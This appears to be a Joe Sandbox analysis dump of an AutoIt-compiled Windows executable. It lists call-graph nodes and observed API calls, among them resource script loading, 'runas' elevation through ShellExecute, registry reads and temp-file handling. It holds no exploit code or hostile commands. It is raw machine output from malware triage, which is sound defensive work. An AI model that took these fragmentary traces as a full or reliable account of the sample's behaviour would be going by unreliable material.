22 API calls 96041->96042 96043 786afc 96041->96043 96042->96043 96043->95977 96044 7904f0 96043->96044 96045 790502 96044->96045 96048 79050b 96045->96048 96103 79a732 22 API calls 96045->96103 96047 7905c0 96047->95971 96048->96047 96049 79fddb 22 API calls 96048->96049 96050 790629 96049->96050 96051 79fddb 22 API calls 96050->96051 96052 790632 96051->96052 96053 789cb3 22 API calls 96052->96053 96054 790641 96053->96054 96054->95971 96055->95968 96056->95968 96057->95963 96058->95977 96059->95977 96060->95948 96061->95977 96062->95984 96063->95984 96064->95983 96065->95989 96068 7e8e74 _wcslen 96066->96068 96067 7e8f63 96067->96007 96067->96013 96068->96067 96069 7e8f68 96068->96069 96070 7e8ea9 96068->96070 96069->96067 96088 79ce60 41 API calls 96069->96088 96070->96067 96087 79ce60 41 API calls 96070->96087 96074 786d91 96073->96074 96075 786d34 96073->96075 96076 7893b2 22 API calls 96074->96076 96075->96074 96077 786d3f 96075->96077 96082 786d62 __fread_nolock 96076->96082 96078 7c4c9d 96077->96078 96079 786d5a 96077->96079 96081 79fddb 22 API calls 96078->96081 96089 786f34 22 API calls 96079->96089 96083 7c4ca7 96081->96083 96082->96010 96084 79fe0b 22 API calls 96083->96084 96085 7c4cda 96084->96085 96086->96012 96087->96070 96088->96069 96089->96082 96090->96028 96092 79fddb 22 API calls 96091->96092 96093 786409 96092->96093 96093->96039 96095 78b01b 96094->96095 96096 7cfb4d 96095->96096 96101 78b023 ISource 96095->96101 96097 79fddb 22 API calls 96096->96097 96099 7cfb59 96097->96099 96098 78b02a 96098->96041 96101->96098 96102 78b090 22 API calls ISource 96101->96102 96102->96101 96103->96048 96105 7edbdc GetFileAttributesW 96104->96105 96106 7ed4d5 96104->96106 96105->96106 96107 7edbe8 FindFirstFileW 96105->96107 96106->95791 96107->96106 96108 7edbf9 FindClose 96107->96108 96108->96106 96138 786270 96109->96138 96111 789fd2 96144 78a4a1 96111->96144 96113 789fec 96113->95830 96116 78a6c3 22 API calls 96136 789eb5 96116->96136 96117 7cf7c4 96156 
7e96e2 84 API calls __wsopen_s 96117->96156 96118 7cf699 96125 79fddb 22 API calls 96118->96125 96119 78a405 96119->96113 96157 7e96e2 84 API calls __wsopen_s 96119->96157 96122 78a4a1 22 API calls 96122->96136 96124 7cf7d2 96126 78a4a1 22 API calls 96124->96126 96127 7cf754 96125->96127 96128 7cf7e8 96126->96128 96129 79fe0b 22 API calls 96127->96129 96128->96113 96130 78a12c __fread_nolock 96129->96130 96130->96117 96130->96119 96132 78a587 22 API calls 96132->96136 96133 78aec9 22 API calls 96134 78a0db CharUpperBuffW 96133->96134 96152 78a673 22 API calls 96134->96152 96136->96111 96136->96116 96136->96117 96136->96118 96136->96119 96136->96122 96136->96130 96136->96132 96136->96133 96143 784573 41 API calls _wcslen 96136->96143 96153 7848c8 23 API calls 96136->96153 96154 7849bd 22 API calls __fread_nolock 96136->96154 96155 78a673 22 API calls 96136->96155 96137->95834 96139 79fe0b 22 API calls 96138->96139 96140 786295 96139->96140 96141 79fddb 22 API calls 96140->96141 96142 7862a3 96141->96142 96142->96136 96143->96136 96145 78a52b 96144->96145 96150 78a4b1 __fread_nolock 96144->96150 96148 79fe0b 22 API calls 96145->96148 96146 79fddb 22 API calls 96147 78a4b8 96146->96147 96149 79fddb 22 API calls 96147->96149 96151 78a4d6 96147->96151 96148->96150 96149->96151 96150->96146 96151->96113 96152->96136 96153->96136 96154->96136 96155->96136 96156->96124 96157->96113 96159 7ae684 ___BuildCatchObject 96158->96159 96160 7ae6aa 96159->96160 96161 7ae695 96159->96161 96170 7ae6a5 __wsopen_s 96160->96170 96171 7a918d EnterCriticalSection 96160->96171 96188 7af2d9 20 API calls __dosmaperr 96161->96188 96164 7ae69a 96189 7b27ec 26 API calls pre_c_initialization 96164->96189 96165 7ae6c6 96172 7ae602 96165->96172 96168 7ae6d1 96190 7ae6ee LeaveCriticalSection __fread_nolock 96168->96190 96170->95836 96171->96165 96173 7ae60f 96172->96173 96174 7ae624 96172->96174 96216 7af2d9 20 API calls __dosmaperr 96173->96216 96181 7ae61f 96174->96181 96191 7adc0b 96174->96191 
96176 7ae614 96217 7b27ec 26 API calls pre_c_initialization 96176->96217 96181->96168 96183 7ad955 __fread_nolock 26 API calls 96184 7ae646 96183->96184 96201 7b862f 96184->96201 96187 7b29c8 _free 20 API calls 96187->96181 96188->96164 96189->96170 96190->96170 96192 7adc23 96191->96192 96193 7adc1f 96191->96193 96192->96193 96194 7ad955 __fread_nolock 26 API calls 96192->96194 96197 7b4d7a 96193->96197 96195 7adc43 96194->96195 96218 7b59be 96195->96218 96198 7b4d90 96197->96198 96199 7ae640 96197->96199 96198->96199 96200 7b29c8 _free 20 API calls 96198->96200 96199->96183 96200->96199 96202 7b863e 96201->96202 96203 7b8653 96201->96203 96333 7af2c6 20 API calls __dosmaperr 96202->96333 96205 7b868e 96203->96205 96210 7b867a 96203->96210 96335 7af2c6 20 API calls __dosmaperr 96205->96335 96207 7b8643 96334 7af2d9 20 API calls __dosmaperr 96207->96334 96208 7b8693 96336 7af2d9 20 API calls __dosmaperr 96208->96336 96330 7b8607 96210->96330 96213 7b869b 96337 7b27ec 26 API calls pre_c_initialization 96213->96337 96214 7ae64c 96214->96181 96214->96187 96216->96176 96217->96181 96219 7b59ca ___BuildCatchObject 96218->96219 96220 7b59ea 96219->96220 96221 7b59d2 96219->96221 96223 7b5a88 96220->96223 96228 7b5a1f 96220->96228 96297 7af2c6 20 API calls __dosmaperr 96221->96297 96302 7af2c6 20 API calls __dosmaperr 96223->96302 96224 7b59d7 96298 7af2d9 20 API calls __dosmaperr 96224->96298 96227 7b5a8d 96303 7af2d9 20 API calls __dosmaperr 96227->96303 96243 7b5147 EnterCriticalSection 96228->96243 96229 7b59df __wsopen_s 96229->96193 96232 7b5a95 96304 7b27ec 26 API calls pre_c_initialization 96232->96304 96233 7b5a25 96235 7b5a41 96233->96235 96236 7b5a56 96233->96236 96299 7af2d9 20 API calls __dosmaperr 96235->96299 96244 7b5aa9 96236->96244 96239 7b5a46 96300 7af2c6 20 API calls __dosmaperr 96239->96300 96242 7b5a51 96301 7b5a80 LeaveCriticalSection __wsopen_s 96242->96301 96243->96233 96245 7b5ad7 96244->96245 96284 7b5ad0 96244->96284 96246 7b5adb 96245->96246 
96247 7b5afa 96245->96247 96312 7af2c6 20 API calls __dosmaperr 96246->96312 96250 7b5b4b 96247->96250 96251 7b5b2e 96247->96251 96248 7a0a8c CatchGuardHandler 5 API calls 96252 7b5cb1 96248->96252 96255 7b5b61 96250->96255 96318 7b9424 28 API calls __fread_nolock 96250->96318 96315 7af2c6 20 API calls __dosmaperr 96251->96315 96252->96242 96253 7b5ae0 96313 7af2d9 20 API calls __dosmaperr 96253->96313 96305 7b564e 96255->96305 96257 7b5b33 96316 7af2d9 20 API calls __dosmaperr 96257->96316 96259 7b5ae7 96314 7b27ec 26 API calls pre_c_initialization 96259->96314 96264 7b5ba8 96270 7b5bbc 96264->96270 96271 7b5c02 WriteFile 96264->96271 96265 7b5b6f 96267 7b5b73 96265->96267 96268 7b5b95 96265->96268 96266 7b5b3b 96317 7b27ec 26 API calls pre_c_initialization 96266->96317 96272 7b5c69 96267->96272 96319 7b55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96267->96319 96320 7b542e 45 API calls 3 library calls 96268->96320 96275 7b5bf2 96270->96275 96276 7b5bc4 96270->96276 96274 7b5c25 GetLastError 96271->96274 96279 7b5b8b 96271->96279 96272->96284 96327 7af2d9 20 API calls __dosmaperr 96272->96327 96274->96279 96323 7b56c4 7 API calls 2 library calls 96275->96323 96280 7b5bc9 96276->96280 96281 7b5be2 96276->96281 96279->96272 96279->96284 96288 7b5c45 96279->96288 96280->96272 96286 7b5bd2 96280->96286 96322 7b5891 8 API calls 2 library calls 96281->96322 96283 7b5be0 96283->96279 96284->96248 96321 7b57a3 7 API calls 2 library calls 96286->96321 96287 7b5c8e 96328 7af2c6 20 API calls __dosmaperr 96287->96328 96291 7b5c4c 96288->96291 96292 7b5c60 96288->96292 96324 7af2d9 20 API calls __dosmaperr 96291->96324 96326 7af2a3 20 API calls __dosmaperr 96292->96326 96295 7b5c51 96325 7af2c6 20 API calls __dosmaperr 96295->96325 96297->96224 96298->96229 96299->96239 96300->96242 96301->96229 96302->96227 96303->96232 96304->96229 96306 7bf89b __fread_nolock 26 API calls 96305->96306 96307 7b565e 96306->96307 96308 7b5663 96307->96308 96329 7b2d74 38 API calls 3 
library calls 96307->96329 96308->96264 96308->96265 96310 7b5686 96310->96308 96311 7b56a4 GetConsoleMode 96310->96311 96311->96308 96312->96253 96313->96259 96314->96284 96315->96257 96316->96266 96317->96284 96318->96255 96319->96279 96320->96279 96321->96283 96322->96283 96323->96283 96324->96295 96325->96284 96326->96284 96327->96287 96328->96284 96329->96310 96338 7b8585 96330->96338 96332 7b862b 96332->96214 96333->96207 96334->96214 96335->96208 96336->96213 96337->96214 96339 7b8591 ___BuildCatchObject 96338->96339 96349 7b5147 EnterCriticalSection 96339->96349 96341 7b859f 96342 7b85d1 96341->96342 96343 7b85c6 96341->96343 96365 7af2d9 20 API calls __dosmaperr 96342->96365 96350 7b86ae 96343->96350 96346 7b85cc 96366 7b85fb LeaveCriticalSection __wsopen_s 96346->96366 96348 7b85ee __wsopen_s 96348->96332 96349->96341 96367 7b53c4 96350->96367 96352 7b86c4 96380 7b5333 21 API calls 2 library calls 96352->96380 96354 7b86be 96354->96352 96355 7b53c4 __wsopen_s 26 API calls 96354->96355 96364 7b86f6 96354->96364 96360 7b86ed 96355->96360 96356 7b53c4 __wsopen_s 26 API calls 96357 7b8702 FindCloseChangeNotification 96356->96357 96357->96352 96361 7b870e GetLastError 96357->96361 96358 7b871c 96359 7b873e 96358->96359 96381 7af2a3 20 API calls __dosmaperr 96358->96381 96359->96346 96363 7b53c4 __wsopen_s 26 API calls 96360->96363 96361->96352 96363->96364 96364->96352 96364->96356 96365->96346 96366->96348 96368 7b53d1 96367->96368 96369 7b53e6 96367->96369 96382 7af2c6 20 API calls __dosmaperr 96368->96382 96373 7b540b 96369->96373 96384 7af2c6 20 API calls __dosmaperr 96369->96384 96372 7b53d6 96383 7af2d9 20 API calls __dosmaperr 96372->96383 96373->96354 96374 7b5416 96385 7af2d9 20 API calls __dosmaperr 96374->96385 96377 7b53de 96377->96354 96378 7b541e 96386 7b27ec 26 API calls pre_c_initialization 96378->96386 96380->96358 96381->96359 96382->96372 96383->96377 96384->96374 96385->96378 96386->96377 96575 784e90 LoadLibraryA 96387->96575 96392 7c3ccf 
96394 784f39 68 API calls 96392->96394 96393 784ef6 LoadLibraryExW 96583 784e59 LoadLibraryA 96393->96583 96396 7c3cd6 96394->96396 96398 784e59 3 API calls 96396->96398 96400 7c3cde 96398->96400 96605 7850f5 96400->96605 96401 784f20 96401->96400 96402 784f2c 96401->96402 96404 784f39 68 API calls 96402->96404 96406 784f31 96404->96406 96406->95858 96406->95862 96408 7c3d05 96410 78a961 22 API calls 96409->96410 96411 785275 96410->96411 96412 78a961 22 API calls 96411->96412 96413 78527d 96412->96413 96414 78a961 22 API calls 96413->96414 96415 785285 96414->96415 96416 78a961 22 API calls 96415->96416 96417 78528d 96416->96417 96418 7c3df5 96417->96418 96419 7852c1 96417->96419 96420 78a8c7 22 API calls 96418->96420 96421 786d25 22 API calls 96419->96421 96422 7c3dfe 96420->96422 96423 7852cf 96421->96423 96424 78a6c3 22 API calls 96422->96424 96425 7893b2 22 API calls 96423->96425 96427 785304 96424->96427 96426 7852d9 96425->96426 96426->96427 96428 786d25 22 API calls 96426->96428 96430 785325 96427->96430 96443 785349 96427->96443 96450 7c3e20 96427->96450 96429 7852fa 96428->96429 96432 7893b2 22 API calls 96429->96432 96434 784c6d 22 API calls 96430->96434 96430->96443 96431 786d25 22 API calls 96433 78535a 96431->96433 96432->96427 96436 785370 96433->96436 96439 78a8c7 22 API calls 96433->96439 96437 785332 96434->96437 96435 785384 96440 78538f 96435->96440 96444 78a8c7 22 API calls 96435->96444 96436->96435 96441 78a8c7 22 API calls 96436->96441 96442 786d25 22 API calls 96437->96442 96437->96443 96438 786b57 22 API calls 96447 7c3ee0 96438->96447 96439->96436 96445 78a8c7 22 API calls 96440->96445 96448 78539a 96440->96448 96441->96435 96442->96443 96443->96431 96444->96440 96445->96448 96446 784c6d 22 API calls 96446->96447 96447->96443 96447->96446 96752 7849bd 22 API calls __fread_nolock 96447->96752 96448->95892 96450->96438 96452 78aec9 22 API calls 96451->96452 96453 784c78 96452->96453 96453->95896 96453->95897 96455 786362 96454->96455 96456 
7c4a51 96454->96456 96753 786373 96455->96753 96763 784a88 22 API calls __fread_nolock 96456->96763 96459 78636e 96459->95905 96460 7c4a5b 96461 7c4a67 96460->96461 96462 78a8c7 22 API calls 96460->96462 96462->96461 96464 7ed7d8 96463->96464 96465 7ed7dd 96464->96465 96466 7ed7f3 96464->96466 96469 78a8c7 22 API calls 96465->96469 96516 7ed7ee 96465->96516 96467 78a961 22 API calls 96466->96467 96468 7ed7fb 96467->96468 96470 78a961 22 API calls 96468->96470 96469->96516 96471 7ed803 96470->96471 96472 78a961 22 API calls 96471->96472 96473 7ed80e 96472->96473 96474 78a961 22 API calls 96473->96474 96475 7ed816 96474->96475 96476 78a961 22 API calls 96475->96476 96477 7ed81e 96476->96477 96478 78a961 22 API calls 96477->96478 96479 7ed826 96478->96479 96480 78a961 22 API calls 96479->96480 96481 7ed82e 96480->96481 96482 78a961 22 API calls 96481->96482 96483 7ed836 96482->96483 96484 78525f 22 API calls 96483->96484 96485 7ed84d 96484->96485 96486 78525f 22 API calls 96485->96486 96487 7ed866 96486->96487 96488 784c6d 22 API calls 96487->96488 96489 7ed872 96488->96489 96490 7ed885 96489->96490 96491 7893b2 22 API calls 96489->96491 96492 784c6d 22 API calls 96490->96492 96491->96490 96493 7ed88e 96492->96493 96494 7ed89e 96493->96494 96495 7893b2 22 API calls 96493->96495 96496 7ed8b0 96494->96496 96498 78a8c7 22 API calls 96494->96498 96495->96494 96497 786350 22 API calls 96496->96497 96499 7ed8bb 96497->96499 96498->96496 96764 7ed978 22 API calls 96499->96764 96501 7ed8ca 96765 7ed978 22 API calls 96501->96765 96503 7ed8dd 96504 784c6d 22 API calls 96503->96504 96505 7ed8e7 96504->96505 96506 7ed8fe 96505->96506 96507 7ed8ec 96505->96507 96509 784c6d 22 API calls 96506->96509 96508 7833c6 22 API calls 96507->96508 96510 7ed8f9 96508->96510 96511 7ed907 96509->96511 96514 786350 22 API calls 96510->96514 96512 7ed925 96511->96512 96513 7833c6 22 API calls 96511->96513 96515 786350 22 API calls 96512->96515 96513->96510 96514->96512 96515->96516 96516->95913 
96518 7f2954 __wsopen_s 96517->96518 96519 79fe0b 22 API calls 96518->96519 96520 7f2971 96519->96520 96521 785722 22 API calls 96520->96521 96522 7f297b 96521->96522 96523 7f274e 27 API calls 96522->96523 96524 7f2986 96523->96524 96525 78511f 64 API calls 96524->96525 96526 7f299b 96525->96526 96527 7f29bf 96526->96527 96528 7f2a6c 96526->96528 96779 7f2e66 96527->96779 96530 7f2e66 75 API calls 96528->96530 96545 7f2a38 96530->96545 96533 7850f5 40 API calls 96534 7f2a91 96533->96534 96535 7850f5 40 API calls 96534->96535 96537 7f2aa1 96535->96537 96536 7f29ed 96786 7ad583 26 API calls 96536->96786 96539 7850f5 40 API calls 96537->96539 96538 7f2a75 ISource 96538->95920 96541 7f2abc 96539->96541 96542 7850f5 40 API calls 96541->96542 96543 7f2acc 96542->96543 96544 7850f5 40 API calls 96543->96544 96546 7f2ae7 96544->96546 96545->96533 96545->96538 96547 7850f5 40 API calls 96546->96547 96548 7f2af7 96547->96548 96549 7850f5 40 API calls 96548->96549 96550 7f2b07 96549->96550 96551 7850f5 40 API calls 96550->96551 96552 7f2b17 96551->96552 96766 7f3017 GetTempPathW GetTempFileNameW 96552->96766 96554 7f2b22 96555 7ae5eb 29 API calls 96554->96555 96564 7f2b33 96555->96564 96556 7ae678 67 API calls 96557 7f2bf8 96556->96557 96559 7f2bfe DeleteFileW 96557->96559 96560 7f2c12 96557->96560 96558 7850f5 40 API calls 96558->96564 96559->96538 96561 7f2c91 CopyFileW 96560->96561 96567 7f2c18 96560->96567 96562 7f2cb9 DeleteFileW 96561->96562 96563 7f2ca7 DeleteFileW 96561->96563 96776 7f2fd8 CreateFileW 96562->96776 96563->96538 96564->96538 96564->96558 96568 7f2bed 96564->96568 96767 7adbb3 96564->96767 96787 7f22ce 96567->96787 96568->96556 96571 7f2c80 DeleteFileW 96571->96538 96572->95846 96573->95880 96574->95893 96576 784ea8 GetProcAddress 96575->96576 96577 784ec6 96575->96577 96578 784eb8 96576->96578 96580 7ae5eb 96577->96580 96578->96577 96579 784ebf FreeLibrary 96578->96579 96579->96577 96613 7ae52a 96580->96613 96582 784eea 96582->96392 96582->96393 96584 
784e8d 96583->96584 96585 784e6e GetProcAddress 96583->96585 96588 784f80 96584->96588 96586 784e7e 96585->96586 96586->96584 96587 784e86 FreeLibrary 96586->96587 96587->96584 96589 79fe0b 22 API calls 96588->96589 96590 784f95 96589->96590 96591 785722 22 API calls 96590->96591 96592 784fa1 __fread_nolock 96591->96592 96593 7c3d1d 96592->96593 96594 7850a5 96592->96594 96604 784fdc 96592->96604 96676 7f304d 74 API calls 96593->96676 96665 7842a2 CreateStreamOnHGlobal 96594->96665 96597 7c3d22 96599 78511f 64 API calls 96597->96599 96598 7850f5 40 API calls 96598->96604 96600 7c3d45 96599->96600 96601 7850f5 40 API calls 96600->96601 96602 78506e ISource 96601->96602 96602->96401 96604->96597 96604->96598 96604->96602 96671 78511f 96604->96671 96606 785107 96605->96606 96609 7c3d70 96605->96609 96698 7ae8c4 96606->96698 96610 7f28fe 96735 7f274e 96610->96735 96612 7f2919 96612->96408 96616 7ae536 ___BuildCatchObject 96613->96616 96614 7ae544 96638 7af2d9 20 API calls __dosmaperr 96614->96638 96616->96614 96618 7ae574 96616->96618 96617 7ae549 96639 7b27ec 26 API calls pre_c_initialization 96617->96639 96620 7ae579 96618->96620 96621 7ae586 96618->96621 96640 7af2d9 20 API calls __dosmaperr 96620->96640 96630 7b8061 96621->96630 96624 7ae554 __wsopen_s 96624->96582 96625 7ae58f 96626 7ae595 96625->96626 96628 7ae5a2 96625->96628 96641 7af2d9 20 API calls __dosmaperr 96626->96641 96642 7ae5d4 LeaveCriticalSection __fread_nolock 96628->96642 96631 7b806d ___BuildCatchObject 96630->96631 96643 7b2f5e EnterCriticalSection 96631->96643 96633 7b807b 96644 7b80fb 96633->96644 96637 7b80ac __wsopen_s 96637->96625 96638->96617 96639->96624 96640->96624 96641->96624 96642->96624 96643->96633 96645 7b811e 96644->96645 96646 7b8177 96645->96646 96653 7b8088 96645->96653 96660 7a918d EnterCriticalSection 96645->96660 96661 7a91a1 LeaveCriticalSection 96645->96661 96647 7b4c7d __dosmaperr 20 API calls 96646->96647 96649 7b8180 96647->96649 96650 7b29c8 _free 20 API calls 

                                    Control-flow Graph: function at 7842de (graph not preserved)
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0078430D
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • GetCurrentProcess.KERNEL32(?,0081CB64,00000000,?,?), ref: 00784422
                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00784429
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00784454
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00784466
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00784474
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0078447B
                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 007844A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                    • API String ID: 3290436268-3101561225
                                    • Opcode ID: b5b7f992073d36f137be756c1e0165b287d964548d8c576c3955af1f9ff0588d
                                    • Instruction ID: 4996ed424bab1327820c0db2e9c670f844569f0a017dcb0c8864157b37595510
                                    • Opcode Fuzzy Hash: b5b7f992073d36f137be756c1e0165b287d964548d8c576c3955af1f9ff0588d
                                    • Instruction Fuzzy Hash: 88A1A36294A3C1DFCF11D769BCAD7D67FA87F36346B18889DD04593B22D26C4908CB21

                                    Control-flow Graph

                                    [Control-flow graph not reproduced; entry node 7842a2. API calls labelled in the graph: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource]
                                    APIs
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007850AA,?,?,00000000,00000000), ref: 007842B2
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007850AA,?,?,00000000,00000000), ref: 007842C9
                                    • LoadResource.KERNEL32(?,00000000,?,?,007850AA,?,?,00000000,00000000,?,?,?,?,?,?,00784F20), ref: 007C35BE
                                    • SizeofResource.KERNEL32(?,00000000,?,?,007850AA,?,?,00000000,00000000,?,?,?,?,?,?,00784F20), ref: 007C35D3
                                    • LockResource.KERNEL32(007850AA,?,?,007850AA,?,?,00000000,00000000,?,?,?,?,?,?,00784F20,?), ref: 007C35E6
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT

                                    APIs
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00782B6B
                                      • Part of subcall function 00783A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00851418,?,00782E7F,?,?,?,00000000), ref: 00783A78
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00842224), ref: 007C2C10
                                    • ShellExecuteW.SHELL32(00000000,?,?,00842224), ref: 007C2C17
                                    Similarity
                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                    • String ID: runas
                                    APIs
                                    • lstrlenW.KERNEL32(?,007C5222), ref: 007EDBCE
                                    • GetFileAttributesW.KERNELBASE(?), ref: 007EDBDD
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 007EDBEE
                                    • FindClose.KERNEL32(00000000), ref: 007EDBFA
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                    APIs
                                    • GetInputState.USER32 ref: 0078D807
                                    • timeGetTime.WINMM ref: 0078DA07
                                    • Sleep.KERNEL32(0000000A), ref: 0078DBB1
                                    • Sleep.KERNEL32(0000000A), ref: 007D2B76
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 007D2C11
                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 007D2C29
                                    • CloseHandle.KERNEL32(?), ref: 007D2C3D
                                    • Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 007D2CA9
                                    Similarity
                                    • API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00782D07
                                    • RegisterClassExW.USER32(00000030), ref: 00782D31
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00782D42
                                    • InitCommonControlsEx.COMCTL32(?), ref: 00782D5F
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00782D6F
                                    • LoadIconW.USER32(000000A9), ref: 00782D85
                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00782D94
                                    Similarity
                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated

                                    Control-flow Graph

                                    [Control-flow graph not reproduced; entry node 7b8d45. API calls labelled in the graph: GetConsoleMode, ReadConsoleW, ReadFile, GetLastError]
                                    Similarity
                                    • String ID: .z

                                    Control-flow Graph

                                    [Control-flow graph not reproduced; entry node 7c065b. API calls labelled in the graph: GetFileType, GetLastError, CloseHandle]
                                    APIs
                                      • Part of subcall function 007C039A: CreateFileW.KERNELBASE(00000000,00000000,?,007C0704,?,?,00000000,?,007C0704,00000000,0000000C), ref: 007C03B7
                                    • GetLastError.KERNEL32 ref: 007C076F
                                    • __dosmaperr.LIBCMT ref: 007C0776
                                    • GetFileType.KERNELBASE(00000000), ref: 007C0782
                                    • GetLastError.KERNEL32 ref: 007C078C
                                    • __dosmaperr.LIBCMT ref: 007C0795
                                    • CloseHandle.KERNEL32(00000000), ref: 007C07B5
                                    • CloseHandle.KERNEL32(?), ref: 007C08FF
                                    • GetLastError.KERNEL32 ref: 007C0931
                                    • __dosmaperr.LIBCMT ref: 007C0938
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H

                                    APIs
                                      • Part of subcall function 00783A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00851418,?,00782E7F,?,?,?,00000000), ref: 00783A78
                                      • Part of subcall function 00783357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00783379
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0078356A
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007C318D
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007C31CE
                                    • RegCloseKey.ADVAPI32(?), ref: 007C3210
                                    • _wcslen.LIBCMT ref: 007C3277
                                    • _wcslen.LIBCMT ref: 007C3286
                                    Similarity
                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00782B8E
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00782B9D
                                    • LoadIconW.USER32(00000063), ref: 00782BB3
                                    • LoadIconW.USER32(000000A4), ref: 00782BC5
                                    • LoadIconW.USER32(000000A2), ref: 00782BD7
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00782BEF
                                    • RegisterClassExW.USER32(?), ref: 00782C40
                                      • Part of subcall function 00782CD4: GetSysColorBrush.USER32(0000000F), ref: 00782D07
                                      • Part of subcall function 00782CD4: RegisterClassExW.USER32(00000030), ref: 00782D31
                                      • Part of subcall function 00782CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00782D42
                                      • Part of subcall function 00782CD4: InitCommonControlsEx.COMCTL32(?), ref: 00782D5F
                                      • Part of subcall function 00782CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00782D6F
                                      • Part of subcall function 00782CD4: LoadIconW.USER32(000000A9), ref: 00782D85
                                      • Part of subcall function 00782CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00782D94
                                    Similarity
                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                    • String ID: #$0$AutoIt v3

                                    Control-flow Graph

                                    [Control-flow graph not reproduced; entry node 783170. API calls labelled in the graph: DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow, SetFocus]
                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0078316A,?,?), ref: 007831D8
                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,0078316A,?,?), ref: 00783204
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00783227
                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0078316A,?,?), ref: 00783232
                                    • CreatePopupMenu.USER32 ref: 00783246
                                    • PostQuitMessage.USER32(00000000), ref: 00783267
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                    • String ID: TaskbarCreated
                                    • API String ID: 129472671-2362178303

                                    Control-flow Graph

                                    APIs
